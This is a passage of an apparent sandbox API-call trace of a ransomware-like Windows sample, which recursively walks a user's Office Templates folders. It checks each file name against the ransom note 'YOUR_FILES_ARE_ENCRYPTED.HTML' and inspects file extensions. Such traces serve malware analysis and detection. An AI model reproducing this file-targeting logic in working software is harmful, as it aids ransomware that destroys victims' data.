[0123.181] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates" [0123.181] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*" [0123.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0123.182] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.182] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0123.182] StrStrIW (lpFirst="LiveContent", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.183] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned 73 [0123.183] GetProcessHeap () returned 0x600000 [0123.183] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0123.184] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0123.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0123.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4694, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0123.185] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4694, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0123.185] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4694, dwReserved1=0x6f4618, cFileName="16", cAlternateFileName="")) returned 1 [0123.185] StrStrIW (lpFirst="16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.185] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned 76 [0123.185] GetProcessHeap () returned 0x600000 [0123.185] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0123.185] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0123.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0123.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.186] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="..", cAlternateFileName="")) returned 1 [0123.186] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="Managed", cAlternateFileName="")) returned 1 [0123.186] StrStrIW (lpFirst="Managed", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.186] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned 84 [0123.186] GetProcessHeap () returned 0x600000 [0123.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3340008 [0123.187] lstrcpyW (in: lpString1=0x3340008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0123.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0123.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.188] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="..", cAlternateFileName="")) returned 1 [0123.188] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0123.188] StrStrIW (lpFirst="Document Themes", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.189] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned 100 [0123.189] GetProcessHeap () returned 0x600000 [0123.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.189] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0123.189] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0123.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.189] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.189] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.189] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.189] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned 105 [0123.189] GetProcessHeap () returned 0x600000 [0123.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.190] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0123.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0123.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0123.192] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="..", cAlternateFileName="")) returned 1 [0123.192] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9826b304, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9826b304, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x70d51000, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x893c1, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03090430[[fn=Banded]].thmx", cAlternateFileName="TM0309~1.THM")) returned 1 [0123.192] StrStrIW (lpFirst="TM03090430[[fn=Banded]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.192] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 134 [0123.192] PathFindExtensionW (pszPath="TM03090430[[fn=Banded]].thmx") returned=".thmx" [0123.192] lstrlenW (lpString=".thmx") returned 5 [0123.192] PathFindExtensionW (pszPath="TM03090430[[fn=Banded]].thmx") returned=".thmx" [0123.192] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984f5d1e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984f5d1e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa299a700, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x192bb1, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03090434[[fn=Wood Type]].thmx", cAlternateFileName="TM0309~2.THM")) returned 1 [0123.192] StrStrIW (lpFirst="TM03090434[[fn=Wood Type]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.192] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 137 [0123.192] PathFindExtensionW (pszPath="TM03090434[[fn=Wood Type]].thmx") returned=".thmx" [0123.192] lstrlenW (lpString=".thmx") returned 5 [0123.192] PathFindExtensionW (pszPath="TM03090434[[fn=Wood Type]].thmx") returned=".thmx" [0123.192] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988e757c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x988e757c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xbdc7df00, ftLastWriteTime.dwHighDateTime=0x1d43fda, nFileSizeHigh=0x0, nFileSizeLow=0x883d3, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457444[[fn=Basis]].thmx", cAlternateFileName="TM2094~1.THM")) returned 1 [0123.192] StrStrIW (lpFirst="TM03457444[[fn=Basis]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.192] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 133 [0123.193] PathFindExtensionW (pszPath="TM03457444[[fn=Basis]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457444[[fn=Basis]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98acf19f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98acf19f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe42a5200, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8b615, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457464[[fn=Dividend]].thmx", cAlternateFileName="TM5959~1.THM")) returned 1 [0123.193] StrStrIW (lpFirst="TM03457464[[fn=Dividend]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.193] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx") returned 136 [0123.193] PathFindExtensionW (pszPath="TM03457464[[fn=Dividend]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457464[[fn=Dividend]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9841a2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9841a2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf2786e00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x7fb28, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457475[[fn=Frame]].thmx", cAlternateFileName="TM7844~1.THM")) returned 1 [0123.193] StrStrIW (lpFirst="TM03457475[[fn=Frame]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.193] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx") returned 133 [0123.193] PathFindExtensionW (pszPath="TM03457475[[fn=Frame]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457475[[fn=Frame]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98af6207, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98af6207, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x34091900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2ef7a4, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457485[[fn=Mesh]].thmx", cAlternateFileName="TM2703~1.THM")) returned 1 [0123.193] StrStrIW (lpFirst="TM03457485[[fn=Mesh]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.193] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx") returned 132 [0123.193] PathFindExtensionW (pszPath="TM03457485[[fn=Mesh]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457485[[fn=Mesh]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987adf7a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x987adf7a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xea6cfe00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xbddaf, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457491[[fn=Metropolitan]].thmx", cAlternateFileName="TM5623~1.THM")) returned 1 [0123.193] StrStrIW (lpFirst="TM03457491[[fn=Metropolitan]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.193] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 140 [0123.193] PathFindExtensionW (pszPath="TM03457491[[fn=Metropolitan]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457491[[fn=Metropolitan]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980694ab, ftCreationTime.dwHighDateTime=0x1d705ee, 